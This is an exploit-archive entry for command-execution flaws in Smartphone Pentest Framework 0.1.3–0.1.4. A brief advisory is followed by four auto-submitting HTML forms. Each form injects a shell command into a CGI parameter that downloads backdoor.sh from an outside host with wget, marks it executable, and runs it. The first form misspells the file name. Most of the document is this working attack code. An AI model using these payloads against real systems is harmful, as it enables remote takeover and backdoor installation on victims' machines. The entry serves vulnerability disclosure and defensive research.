Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities

2012-12-10T00:00:00
ID EXPLOITPACK:469D97BDA856A982AA444C82A3B0BA94
Type exploitpack
Reporter High-Tech Bridge
Modified 2012-12-10T00:00:00

Description

Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/56881/info

Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. 

1.

<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl" 
method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget 
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch && 
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

2. 

<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl" 
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget 
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

3.

<form 
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl" 
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget 
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

4.

<form 
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl" 
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget 
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>